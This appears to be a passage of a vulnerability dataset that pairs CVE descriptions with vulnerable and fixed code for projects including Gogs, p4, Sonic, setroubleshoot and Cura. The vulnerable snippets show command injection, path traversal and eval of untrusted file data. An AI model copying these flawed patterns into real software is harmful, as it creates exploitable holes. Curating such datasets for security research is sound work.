files\")\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tfor _, file := range files {\n\t\t\t\tif file == f.TreePath {\n\t\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_changed_while_editing\", c.Repo.RepoLink+\"/compare/\"+lastCommit+\"...\"+c.Repo.CommitID), tmplEditorEdit, &f)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif oldTreePath != f.TreePath {\n\t\t// We have a new filename (rename or completely new file) so we need to make sure it doesn't already exist, can't clobber.\n\t\tentry, err := c.Repo.Commit.TreeEntry(f.TreePath)\n\t\tif err != nil {\n\t\t\tif !gitutil.IsErrRevisionNotExist(err) {\n\t\t\t\tc.Error(err, \"get tree entry\")\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tif entry != nil {\n\t\t\tc.FormErr(\"TreePath\")\n\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_already_exists\", f.TreePath), tmplEditorEdit, &f)\n\t\t\treturn\n\t\t}\n\t}\n\n\tmessage := strings.TrimSpace(f.CommitSummary)\n\tif message == \"\" {\n\t\tif isNewFile {\n\t\t\tmessage = c.Tr(\"repo.editor.add\", f.TreePath)\n\t\t} else {\n\t\t\tmessage = c.Tr(\"repo.editor.update\", f.TreePath)\n\t\t}\n\t}\n\n\tf.CommitMessage = strings.TrimSpace(f.CommitMessage)\n\tif len(f.CommitMessage) > 0 {\n\t\tmessage += \"\\n\\n\" + f.CommitMessage\n\t}\n\n\tif err := c.Repo.Repository.UpdateRepoFile(c.User, database.UpdateRepoFileOptions{\n\t\tOldBranch: oldBranchName,\n\t\tNewBranch: branchName,\n\t\tOldTreeName: oldTreePath,\n\t\tNewTreeName: f.TreePath,\n\t\tMessage: message,\n\t\tContent: strings.ReplaceAll(f.Content, \"\\r\", \"\"),\n\t\tIsNewFile: isNewFile,\n\t}); err != nil {\n\t\tlog.Error(\"Failed to update repo file: %v\", err)\n\t\tc.FormErr(\"TreePath\")\n\t\tc.RenderWithErr(c.Tr(\"repo.editor.fail_to_update_file\", f.TreePath, errors.InternalServerError), tmplEditorEdit, &f)\n\t\treturn\n\t}\n\n\tif f.IsNewBrnach() && c.Repo.PullRequest.Allowed {\n\t\tc.Redirect(c.Repo.PullRequestURL(oldBranchName, f.NewBranchName))\n\t} else {\n\t\tc.Redirect(c.Repo.RepoLink + \"/src/\" + branchName + \"/\" + f.TreePath)\n\t}\n}"}], "vul_patch": "--- a/internal/route/repo/editor.go\n+++ b/internal/route/repo/editor.go\n@@ -71,6 +71,7 @@\n \t\t\t\treturn\n \t\t\t}\n \t\t} else {\n+\t\t\t// \\ud83d\\udea8 SECURITY: Do not allow editing if the target file is a symlink.\n \t\t\tif entry.IsSymlink() {\n \t\t\t\tc.FormErr(\"TreePath\")\n \t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_is_a_symlink\", part), tmplEditorEdit, &f)\n@@ -84,7 +85,7 @@\n \t}\n \n \tif !isNewFile {\n-\t\t_, err := c.Repo.Commit.TreeEntry(oldTreePath)\n+\t\tentry, err := c.Repo.Commit.TreeEntry(oldTreePath)\n \t\tif err != nil {\n \t\t\tif gitutil.IsErrRevisionNotExist(err) {\n \t\t\t\tc.FormErr(\"TreePath\")\n@@ -94,6 +95,14 @@\n \t\t\t}\n \t\t\treturn\n \t\t}\n+\n+\t\t// \\ud83d\\udea8 SECURITY: Do not allow editing if the old file is a symlink.\n+\t\tif entry.IsSymlink() {\n+\t\t\tc.FormErr(\"TreePath\")\n+\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_is_a_symlink\", oldTreePath), tmplEditorEdit, &f)\n+\t\t\treturn\n+\t\t}\n+\n \t\tif lastCommit != c.Repo.CommitID {\n \t\t\tfiles, err := c.Repo.Commit.FilesChangedAfter(lastCommit)\n \t\t\tif err != nil {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-25171", "cve_description": "The package p4 before 0.0.7 are vulnerable to Command Injection via the run() function due to improper input sanitization", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/natelong/p4", "patch_url": ["https://github.com/natelong/p4/commit/ae42e251beabf67c00539ec0e1d7aa149ca445fb"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_118_1", "commit": "d37c2b9", "file_path": "p4.js", "start_line": 6, "end_line": 18, "snippet": "function runCommand(command, args, done) {\n if(typeof args === \"function\") {\n done = args;\n args = \"\";\n }\n\n exec(\"p4 \" + command + \" \" + (args || \"\"), function(err, stdOut, stdErr) {\n if(err) return done(err);\n if(stdErr) return done(new Error(stdErr));\n\n done(null, stdOut);\n });\n}"}], "fix_func": [{"id": "fix_js_118_1", "commit": "ae42e25", "file_path": "p4.js", "start_line": 6, "end_line": 34, "snippet": "function runCommand(command, args, done) {\n if(typeof args === \"function\") {\n done = args;\n args = \"\";\n }\n\n if(!Array.isArray(args)) {\n args = [args];\n }\n args.unshift(command);\n\n var child = spawn(\"p4\", args);\n var stdOutBuf = \"\";\n var stdErrBuf = \"\";\n\n child.stdout.on(\"data\", (data) => stdOutBuf += data);\n child.stderr.on(\"data\", (data) => stdErrBuf += data)\n child.on(\"exit\", (code) => {\n if (code !== 0) {\n return done(new Error(`p4 subcommand exited with return code ${}`));\n }\n\n if (stdErrBuf.length > 0) {\n return done(new Error(stdErrBuf));\n }\n\n done(null, stdOutBuf);\n });\n}"}], "vul_patch": "--- a/p4.js\n+++ b/p4.js\n@@ -4,10 +4,26 @@\n args = \"\";\n }\n \n- exec(\"p4 \" + command + \" \" + (args || \"\"), function(err, stdOut, stdErr) {\n- if(err) return done(err);\n- if(stdErr) return done(new Error(stdErr));\n+ if(!Array.isArray(args)) {\n+ args = [args];\n+ }\n+ args.unshift(command);\n \n- done(null, stdOut);\n+ var child = spawn(\"p4\", args);\n+ var stdOutBuf = \"\";\n+ var stdErrBuf = \"\";\n+\n+ child.stdout.on(\"data\", (data) => stdOutBuf += data);\n+ child.stderr.on(\"data\", (data) => stdErrBuf += data)\n+ child.on(\"exit\", (code) => {\n+ if (code !== 0) {\n+ return done(new Error(`p4 subcommand exited with return code ${}`));\n+ }\n+\n+ if (stdErrBuf.length > 0) {\n+ return done(new Error(stdErrBuf));\n+ }\n+\n+ done(null, stdOutBuf);\n });\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-5823", "cve_description": "A file overwrite vulnerability exists in gaizhenbiao/chuanhuchatgpt versions <= 20240410. This vulnerability allows an attacker to gain unauthorized access to overwrite critical configuration files within the system. Exploiting this vulnerability can lead to unauthorized changes in system behavior or security settings. Additionally, tampering with these configuration files can result in a denial of service (DoS) condition, disrupting normal system operation.", "cwe_info": {"CWE-610": {"name": "Externally Controlled Reference to a Resource in Another Sphere", "description": "The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere."}}, "repo": "https://github.com/gaizhenbiao/chuanhuchatgpt", "patch_url": ["https://github.com/gaizhenbiao/chuanhuchatgpt/commit/720c23d755a4a955dcb0a54e8c200a2247a27f8b"], "programing_language": "Python", "vul_func": [{"id": "vul_py_56_1", "commit": "ffea5e9", "file_path": "modules/utils.py", "start_line": 744, "end_line": 760, "snippet": "def update_chuanhu():\n from .repo import background_update\n\n print(\"[Updater] Trying to update...\")\n update_status = background_update()\n if update_status == \"success\":\n logging.info(\"Successfully updated, restart needed\")\n status = 'success'\n return gr.Markdown(value=i18n(\"\\u66f4\\u65b0\\u6210\\u529f\\uff0c\\u8bf7\\u91cd\\u542f\\u672c\\u7a0b\\u5e8f\") + status)\n else:\n status = 'failure'\n return gr.Markdown(\n value=i18n(\n \"\\u66f4\\u65b0\\u5931\\u8d25\\uff0c\\u8bf7\\u5c1d\\u8bd5[\\u624b\\u52a8\\u66f4\\u65b0](https://github.com/GaiZhenbiao/ChuanhuChatGPT/wiki/\\u4f7f\\u7528\\u6559\\u7a0b#\\u624b\\u52a8\\u66f4\\u65b0)\"\n )\n + status\n )"}], "fix_func": [{"id": "fix_py_56_1", "commit": "720c23d755a4a955dcb0a54e8c200a2247a27f8b", "file_path": "ChuanhuChatbot.py", "start_line": 784, "end_line": 784, "snippet": " [user_name],"}, {"id": "fix_py_56_2", "commit": "720c23d755a4a955dcb0a54e8c200a2247a27f8b", "file_path": "modules/utils.py", "start_line": 744, "end_line": 762, "snippet": "def update_chuanhu(username):\n if username not in admin_list:\n return gr.Markdown(value=i18n(\"no_permission_to_update_description\"))\n from .repo import background_update\n\n print(\"[Updater] Trying to update...\")\n update_status = background_update()\n if update_status == \"success\":\n logging.info(\"Successfully updated, restart needed\")\n status = 'success'\n return gr.Markdown(value=i18n(\"\\u66f4\\u65b0\\u6210\\u529f\\uff0c\\u8bf7\\u91cd\\u542f\\u672c\\u7a0b\\u5e8f\") + status)\n else:\n status = 'failure'\n return gr.Markdown(\n value=i18n(\n \"\\u66f4\\u65b0\\u5931\\u8d25\\uff0c\\u8bf7\\u5c1d\\u8bd5[\\u624b\\u52a8\\u66f4\\u65b0](https://github.com/GaiZhenbiao/ChuanhuChatGPT/wiki/\\u4f7f\\u7528\\u6559\\u7a0b#\\u624b\\u52a8\\u66f4\\u65b0)\"\n )\n + status\n )"}, {"id": "fix_py_56_3", "commit": "720c23d755a4a955dcb0a54e8c200a2247a27f8b", "file_path": "modules/utils.py", "start_line": 30, "end_line": 30, "snippet": "from modules.config import retrieve_proxy, hide_history_when_not_logged_in, admin_list"}], "vul_patch": "--- a/modules/utils.py\n+++ b/ChuanhuChatbot.py\n@@ -1,17 +1 @@\n-def update_chuanhu():\n- from .repo import background_update\n-\n- print(\"[Updater] Trying to update...\")\n- update_status = background_update()\n- if update_status == \"success\":\n- logging.info(\"Successfully updated, restart needed\")\n- status = 'success'\n- return gr.Markdown(value=i18n(\"\\u66f4\\u65b0\\u6210\\u529f\\uff0c\\u8bf7\\u91cd\\u542f\\u672c\\u7a0b\\u5e8f\") + status)\n- else:\n- status = 'failure'\n- return gr.Markdown(\n- value=i18n(\n- \"\\u66f4\\u65b0\\u5931\\u8d25\\uff0c\\u8bf7\\u5c1d\\u8bd5[\\u624b\\u52a8\\u66f4\\u65b0](https://github.com/GaiZhenbiao/ChuanhuChatGPT/wiki/\\u4f7f\\u7528\\u6559\\u7a0b#\\u624b\\u52a8\\u66f4\\u65b0)\"\n- )\n- + status\n- )\n+ [user_name],\n\n--- /dev/null\n+++ b/ChuanhuChatbot.py\n@@ -0,0 +1,19 @@\n+def update_chuanhu(username):\n+ if username not in admin_list:\n+ return gr.Markdown(value=i18n(\"no_permission_to_update_description\"))\n+ from .repo import background_update\n+\n+ print(\"[Updater] Trying to update...\")\n+ update_status = background_update()\n+ if update_status == \"success\":\n+ logging.info(\"Successfully updated, restart needed\")\n+ status = 'success'\n+ return gr.Markdown(value=i18n(\"\\u66f4\\u65b0\\u6210\\u529f\\uff0c\\u8bf7\\u91cd\\u542f\\u672c\\u7a0b\\u5e8f\") + status)\n+ else:\n+ status = 'failure'\n+ return gr.Markdown(\n+ value=i18n(\n+ \"\\u66f4\\u65b0\\u5931\\u8d25\\uff0c\\u8bf7\\u5c1d\\u8bd5[\\u624b\\u52a8\\u66f4\\u65b0](https://github.com/GaiZhenbiao/ChuanhuChatGPT/wiki/\\u4f7f\\u7528\\u6559\\u7a0b#\\u624b\\u52a8\\u66f4\\u65b0)\"\n+ )\n+ + status\n+ )\n\n--- /dev/null\n+++ b/ChuanhuChatbot.py\n@@ -0,0 +1 @@\n+from modules.config import retrieve_proxy, hide_history_when_not_logged_in, admin_list\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-5823:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/chuanhuchatgpt\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2024-5823/bin/python hand_test.py\n", "unit_test_cmd": null} {"cve_id": "CVE-2022-46959", "cve_description": "An issue in the component /admin/backups/work-dir of Sonic v1.0.4 allows attackers to execute a directory traversal.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/go-sonic/sonic", "patch_url": ["https://github.com/go-sonic/sonic/commit/5b826db82550b72d23ad74ffda755981a4b6abd9"], "programing_language": "Go", "vul_func": [{"id": "vul_go_194_1", "commit": "c97d242", "file_path": "service/impl/backup.go", "start_line": 49, "end_line": 75, "snippet": "func (b *backupServiceImpl) BackupWholeSite(ctx context.Context, toBackupItems []string) (*dto.BackupDTO, error) {\n\tbackupFilename := consts.SonicBackupPrefix + time.Now().Format(\"2006-01-02-15-04-05\") + util.GenUUIDWithOutDash() + \".zip\"\n\tbackupFilePath := config.BackupDir\n\n\tif _, err := os.Stat(backupFilePath); os.IsNotExist(err) {\n\t\terr = os.MkdirAll(backupFilePath, os.ModePerm)\n\t\tif err != nil {\n\t\t\treturn nil, xerr.NoType.Wrap(err).WithMsg(\"create dir err\")\n\t\t}\n\t} else if err != nil {\n\t\treturn nil, xerr.NoType.Wrap(err).WithMsg(\"get fileInfo\")\n\t}\n\n\tbackupFile := filepath.Join(backupFilePath, backupFilename)\n\n\ttoBackupPaths := []string{}\n\tfor _, toBackupItem := range toBackupItems {\n\t\ttoBackupPath := filepath.Join(b.Config.Sonic.WorkDir, toBackupItem)\n\t\ttoBackupPaths = append(toBackupPaths, toBackupPath)\n\t}\n\n\terr := util.ZipFile(backupFile, toBackupPaths...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn b.buildBackupDTO(ctx, string(service.WholeSite), backupFile)\n}"}], "fix_func": [{"id": "fix_go_194_1", "commit": "5b826db", "file_path": "service/impl/backup.go", "start_line": 49, "end_line": 78, "snippet": "func (b *backupServiceImpl) BackupWholeSite(ctx context.Context, toBackupItems []string) (*dto.BackupDTO, error) {\n\tbackupFilename := consts.SonicBackupPrefix + time.Now().Format(\"2006-01-02-15-04-05\") + util.GenUUIDWithOutDash() + \".zip\"\n\tbackupFilePath := config.BackupDir\n\n\tif _, err := os.Stat(backupFilePath); os.IsNotExist(err) {\n\t\terr = os.MkdirAll(backupFilePath, os.ModePerm)\n\t\tif err != nil {\n\t\t\treturn nil, xerr.NoType.Wrap(err).WithMsg(\"create dir err\")\n\t\t}\n\t} else if err != nil {\n\t\treturn nil, xerr.NoType.Wrap(err).WithMsg(\"get fileInfo\")\n\t}\n\n\tbackupFile := filepath.Join(backupFilePath, backupFilename)\n\n\ttoBackupPaths := []string{}\n\tfor _, toBackupItem := range toBackupItems {\n\t\ttoBackupPath := filepath.Clean(filepath.Join(b.Config.Sonic.WorkDir, toBackupItem))\n\t\tif !strings.HasPrefix(toBackupPath, b.Config.Sonic.WorkDir) {\n\t\t\tcontinue\n\t\t}\n\t\ttoBackupPaths = append(toBackupPaths, toBackupPath)\n\t}\n\n\terr := util.ZipFile(backupFile, toBackupPaths...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn b.buildBackupDTO(ctx, string(service.WholeSite), backupFile)\n}"}], "vul_patch": "--- a/service/impl/backup.go\n+++ b/service/impl/backup.go\n@@ -15,7 +15,10 @@\n \n \ttoBackupPaths := []string{}\n \tfor _, toBackupItem := range toBackupItems {\n-\t\ttoBackupPath := filepath.Join(b.Config.Sonic.WorkDir, toBackupItem)\n+\t\ttoBackupPath := filepath.Clean(filepath.Join(b.Config.Sonic.WorkDir, toBackupItem))\n+\t\tif !strings.HasPrefix(toBackupPath, b.Config.Sonic.WorkDir) {\n+\t\t\tcontinue\n+\t\t}\n \t\ttoBackupPaths = append(toBackupPaths, toBackupPath)\n \t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2016-4444", "cve_description": "The allow_execmod plugin for setroubleshoot before 3.2.23 allows local users to execute arbitrary commands by triggering an execmod SELinux denial with a crafted binary filename, related to the commands.getstatusoutput function.", "cwe_info": {"CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}}, "repo": "https://github.com/fedora-selinux/setroubleshoot", "patch_url": ["https://github.com/fedora-selinux/setroubleshoot/commit/5cd60033ea7f5bdf8c19c27b23ea2d773d9b09f5"], "programing_language": "Python", "vul_func": [{"id": "vul_py_196_1", "commit": "2d12677", "file_path": "plugins/src/allow_execmod.py", "start_line": 93, "end_line": 103, "snippet": " def analyze(self, avc):\n import commands\n if avc.has_any_access_in(['execmod']):\n # MATCH\n if (commands.getstatusoutput(\"eu-readelf -d %s | fgrep -q TEXTREL\" % avc.tpath)[0] == 1):\n return self.report((\"unsafe\"))\n\n mcon = selinux.matchpathcon(avc.tpath.strip('\"'), S_IFREG)[1]\n if mcon.split(\":\")[2] == \"lib_t\":\n return self.report()\n return None"}], "fix_func": [{"id": "fix_py_196_1", "commit": "5cd6003", "file_path": "plugins/src/allow_execmod.py", "start_line": 93, "end_line": 109, "snippet": " def analyze(self, avc):\n import subprocess\n if avc.has_any_access_in(['execmod']):\n # MATCH\n # from https://docs.python.org/2.7/library/subprocess.html#replacing-shell-pipeline\n p1 = subprocess.Popen(['eu-readelf', '-d', avc.tpath], stdout=subprocess.PIPE)\n p2 = subprocess.Popen([\"fgrep\", \"-q\", \"TEXTREL\"], stdin=p1.stdout, stdout=subprocess.PIPE)\n p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.\n p1.wait()\n p2.wait()\n if p2.returncode == 1:\n return self.report((\"unsafe\"))\n\n mcon = selinux.matchpathcon(avc.tpath.strip('\"'), S_IFREG)[1]\n if mcon.split(\":\")[2] == \"lib_t\":\n return self.report()\n return None"}], "vul_patch": "--- a/plugins/src/allow_execmod.py\n+++ b/plugins/src/allow_execmod.py\n@@ -1,8 +1,14 @@\n def analyze(self, avc):\n- import commands\n+ import subprocess\n if avc.has_any_access_in(['execmod']):\n # MATCH\n- if (commands.getstatusoutput(\"eu-readelf -d %s | fgrep -q TEXTREL\" % avc.tpath)[0] == 1):\n+ # from https://docs.python.org/2.7/library/subprocess.html#replacing-shell-pipeline\n+ p1 = subprocess.Popen(['eu-readelf', '-d', avc.tpath], stdout=subprocess.PIPE)\n+ p2 = subprocess.Popen([\"fgrep\", \"-q\", \"TEXTREL\"], stdin=p1.stdout, stdout=subprocess.PIPE)\n+ p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.\n+ p1.wait()\n+ p2.wait()\n+ if p2.returncode == 1:\n return self.report((\"unsafe\"))\n \n mcon = selinux.matchpathcon(avc.tpath.strip('\"'), S_IFREG)[1]\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-8374", "cve_description": "UltiMaker Cura slicer versions 5.7.0-beta.1 through 5.7.2 are vulnerable to code injection via the 3MF format reader (/plugins/ThreeMFReader.py). The vulnerability arises from improper handling of the drop_to_buildplate property within 3MF files, which are ZIP archives containing the model data. When a 3MF file is loaded in Cura, the value of the drop_to_buildplate property is passed to the Python eval() function without proper sanitization, allowing an attacker to execute arbitrary code by crafting a malicious 3MF file. This vulnerability poses a significant risk as 3MF files are commonly shared via 3D model databases.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}}, "repo": "https://github.com/Ultimaker/Cura", "patch_url": ["https://github.com/Ultimaker/Cura/commit/285a241eb28da3188c977f85d68937c0dad79c50"], "programing_language": "Python", "vul_func": [{"id": "vul_py_130_1", "commit": "2d85e9f", "file_path": "plugins/3MFReader/ThreeMFReader.py", "start_line": 96, "end_line": 216, "snippet": " def _convertSavitarNodeToUMNode(savitar_node: Savitar.SceneNode, file_name: str = \"\") -> Optional[SceneNode]:\n \"\"\"Convenience function that converts a SceneNode object (as obtained from libSavitar) to a scene node.\n\n :returns: Scene node.\n \"\"\"\n try:\n node_name = savitar_node.getName()\n node_id = savitar_node.getId()\n except AttributeError:\n Logger.log(\"e\", \"Outdated version of libSavitar detected! Please update to the newest version!\")\n node_name = \"\"\n node_id = \"\"\n\n if node_name == \"\":\n if file_name != \"\":\n node_name = os.path.basename(file_name)\n else:\n node_name = \"Object {}\".format(node_id)\n\n active_build_plate = CuraApplication.getInstance().getMultiBuildPlateModel().activeBuildPlate\n\n um_node = CuraSceneNode() # This adds a SettingOverrideDecorator\n um_node.addDecorator(BuildPlateDecorator(active_build_plate))\n try:\n um_node.addDecorator(ConvexHullDecorator())\n except:\n pass\n um_node.setName(node_name)\n um_node.setId(node_id)\n transformation = ThreeMFReader._createMatrixFromTransformationString(savitar_node.getTransformation())\n um_node.setTransformation(transformation)\n mesh_builder = MeshBuilder()\n\n data = numpy.fromstring(savitar_node.getMeshData().getFlatVerticesAsBytes(), dtype=numpy.float32)\n\n vertices = numpy.resize(data, (int(data.size / 3), 3))\n mesh_builder.setVertices(vertices)\n mesh_builder.calculateNormals(fast=True)\n if file_name:\n # The filename is used to give the user the option to reload the file if it is changed on disk\n # It is only set for the root node of the 3mf file\n mesh_builder.setFileName(file_name)\n mesh_data = mesh_builder.build()\n\n if len(mesh_data.getVertices()):\n um_node.setMeshData(mesh_data)\n\n for child in savitar_node.getChildren():\n child_node = ThreeMFReader._convertSavitarNodeToUMNode(child)\n if child_node:\n um_node.addChild(child_node)\n\n if um_node.getMeshData() is None and len(um_node.getChildren()) == 0:\n return None\n\n settings = savitar_node.getSettings()\n\n # Add the setting override decorator, so we can add settings to this node.\n if settings:\n global_container_stack = CuraApplication.getInstance().getGlobalContainerStack()\n\n # Ensure the correct next container for the SettingOverride decorator is set.\n if global_container_stack:\n default_stack = ExtruderManager.getInstance().getExtruderStack(0)\n\n if default_stack:\n um_node.callDecoration(\"setActiveExtruder\", default_stack.getId())\n\n # Get the definition & set it\n definition_id = ContainerTree.getInstance().machines[global_container_stack.definition.getId()].quality_definition\n um_node.callDecoration(\"getStack\").getTop().setDefinition(definition_id)\n\n setting_container = um_node.callDecoration(\"getStack\").getTop()\n known_setting_keys = um_node.callDecoration(\"getStack\").getAllKeys()\n for key in settings:\n setting_value = settings[key].value\n\n # Extruder_nr is a special case.\n if key == \"extruder_nr\":\n extruder_stack = ExtruderManager.getInstance().getExtruderStack(int(setting_value))\n if extruder_stack:\n um_node.callDecoration(\"setActiveExtruder\", extruder_stack.getId())\n else:\n Logger.log(\"w\", \"Unable to find extruder in position %s\", setting_value)\n continue\n if key == \"print_order\":\n um_node.printOrder = int(setting_value)\n continue\n if key ==\"drop_to_buildplate\":\n um_node.setSetting(SceneNodeSettings.AutoDropDown, eval(setting_value))\n continue\n if key in known_setting_keys:\n setting_container.setProperty(key, \"value\", setting_value)\n else:\n um_node.metadata[key] = settings[key]\n\n if len(um_node.getChildren()) > 0 and um_node.getMeshData() is None:\n if len(um_node.getAllChildren()) == 1:\n # We don't want groups of one, so move the node up one \"level\"\n child_node = um_node.getChildren()[0]\n # Move all the meshes of children so that toolhandles are shown in the correct place.\n if child_node.getMeshData():\n extents = child_node.getMeshData().getExtents()\n move_matrix = Matrix()\n move_matrix.translate(-extents.center)\n child_node.setMeshData(child_node.getMeshData().getTransformed(move_matrix))\n child_node.translate(extents.center)\n parent_transformation = um_node.getLocalTransformation()\n child_transformation = child_node.getLocalTransformation()\n child_node.setTransformation(parent_transformation.multiply(child_transformation))\n um_node = cast(CuraSceneNode, um_node.getChildren()[0])\n else:\n group_decorator = GroupDecorator()\n um_node.addDecorator(group_decorator)\n um_node.setSelectable(True)\n if um_node.getMeshData():\n # Assuming that all nodes with mesh data are printable objects\n # affects (auto) slicing\n sliceable_decorator = SliceableObjectDecorator()\n um_node.addDecorator(sliceable_decorator)\n return um_node"}], "fix_func": [{"id": "fix_py_130_1", "commit": "285a241", "file_path": "plugins/3MFReader/ThreeMFReader.py", "start_line": 97, "end_line": 217, "snippet": " def _convertSavitarNodeToUMNode(savitar_node: Savitar.SceneNode, file_name: str = \"\") -> Optional[SceneNode]:\n \"\"\"Convenience function that converts a SceneNode object (as obtained from libSavitar) to a scene node.\n\n :returns: Scene node.\n \"\"\"\n try:\n node_name = savitar_node.getName()\n node_id = savitar_node.getId()\n except AttributeError:\n Logger.log(\"e\", \"Outdated version of libSavitar detected! Please update to the newest version!\")\n node_name = \"\"\n node_id = \"\"\n\n if node_name == \"\":\n if file_name != \"\":\n node_name = os.path.basename(file_name)\n else:\n node_name = \"Object {}\".format(node_id)\n\n active_build_plate = CuraApplication.getInstance().getMultiBuildPlateModel().activeBuildPlate\n\n um_node = CuraSceneNode() # This adds a SettingOverrideDecorator\n um_node.addDecorator(BuildPlateDecorator(active_build_plate))\n try:\n um_node.addDecorator(ConvexHullDecorator())\n except:\n pass\n um_node.setName(node_name)\n um_node.setId(node_id)\n transformation = ThreeMFReader._createMatrixFromTransformationString(savitar_node.getTransformation())\n um_node.setTransformation(transformation)\n mesh_builder = MeshBuilder()\n\n data = numpy.fromstring(savitar_node.getMeshData().getFlatVerticesAsBytes(), dtype=numpy.float32)\n\n vertices = numpy.resize(data, (int(data.size / 3), 3))\n mesh_builder.setVertices(vertices)\n mesh_builder.calculateNormals(fast=True)\n if file_name:\n # The filename is used to give the user the option to reload the file if it is changed on disk\n # It is only set for the root node of the 3mf file\n mesh_builder.setFileName(file_name)\n mesh_data = mesh_builder.build()\n\n if len(mesh_data.getVertices()):\n um_node.setMeshData(mesh_data)\n\n for child in savitar_node.getChildren():\n child_node = ThreeMFReader._convertSavitarNodeToUMNode(child)\n if child_node:\n um_node.addChild(child_node)\n\n if um_node.getMeshData() is None and len(um_node.getChildren()) == 0:\n return None\n\n settings = savitar_node.getSettings()\n\n # Add the setting override decorator, so we can add settings to this node.\n if settings:\n global_container_stack = CuraApplication.getInstance().getGlobalContainerStack()\n\n # Ensure the correct next container for the SettingOverride decorator is set.\n if global_container_stack:\n default_stack = ExtruderManager.getInstance().getExtruderStack(0)\n\n if default_stack:\n um_node.callDecoration(\"setActiveExtruder\", default_stack.getId())\n\n # Get the definition & set it\n definition_id = ContainerTree.getInstance().machines[global_container_stack.definition.getId()].quality_definition\n um_node.callDecoration(\"getStack\").getTop().setDefinition(definition_id)\n\n setting_container = um_node.callDecoration(\"getStack\").getTop()\n known_setting_keys = um_node.callDecoration(\"getStack\").getAllKeys()\n for key in settings:\n setting_value = settings[key].value\n\n # Extruder_nr is a special case.\n if key == \"extruder_nr\":\n extruder_stack = ExtruderManager.getInstance().getExtruderStack(int(setting_value))\n if extruder_stack:\n um_node.callDecoration(\"setActiveExtruder\", extruder_stack.getId())\n else:\n Logger.log(\"w\", \"Unable to find extruder in position %s\", setting_value)\n continue\n if key == \"print_order\":\n um_node.printOrder = int(setting_value)\n continue\n if key ==\"drop_to_buildplate\":\n um_node.setSetting(SceneNodeSettings.AutoDropDown, parseBool(setting_value))\n continue\n if key in known_setting_keys:\n setting_container.setProperty(key, \"value\", setting_value)\n else:\n um_node.metadata[key] = settings[key]\n\n if len(um_node.getChildren()) > 0 and um_node.getMeshData() is None:\n if len(um_node.getAllChildren()) == 1:\n # We don't want groups of one, so move the node up one \"level\"\n child_node = um_node.getChildren()[0]\n # Move all the meshes of children so that toolhandles are shown in the correct place.\n if child_node.getMeshData():\n extents = child_node.getMeshData().getExtents()\n move_matrix = Matrix()\n move_matrix.translate(-extents.center)\n child_node.setMeshData(child_node.getMeshData().getTransformed(move_matrix))\n child_node.translate(extents.center)\n parent_transformation = um_node.getLocalTransformation()\n child_transformation = child_node.getLocalTransformation()\n child_node.setTransformation(parent_transformation.multiply(child_transformation))\n um_node = cast(CuraSceneNode, um_node.getChildren()[0])\n else:\n group_decorator = GroupDecorator()\n um_node.addDecorator(group_decorator)\n um_node.setSelectable(True)\n if um_node.getMeshData():\n # Assuming that all nodes with mesh data are printable objects\n # affects (auto) slicing\n sliceable_decorator = SliceableObjectDecorator()\n um_node.addDecorator(sliceable_decorator)\n return um_node"}], "vul_patch": "--- a/plugins/3MFReader/ThreeMFReader.py\n+++ b/plugins/3MFReader/ThreeMFReader.py\n@@ -87,7 +87,7 @@\n um_node.printOrder = int(setting_value)\n continue\n if key ==\"drop_to_buildplate\":\n- um_node.setSetting(SceneNodeSettings.AutoDropDown, eval(setting_value))\n+ um_node.setSetting(SceneNodeSettings.AutoDropDown, parseBool(setting_value))\n continue\n if key in known_setting_keys:\n setting_container.setProperty(key, \"value\", setting_value)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-29028", "cve_description": "memos is a privacy-first, lightweight note-taking service. In memos 0.13.2, an SSRF vulnerability exists at the /o/get/httpmeta that allows unauthenticated users to enumerate the internal network and receive limited html values in json form. This vulnerability is fixed in 0.16.1.", "cwe_info": 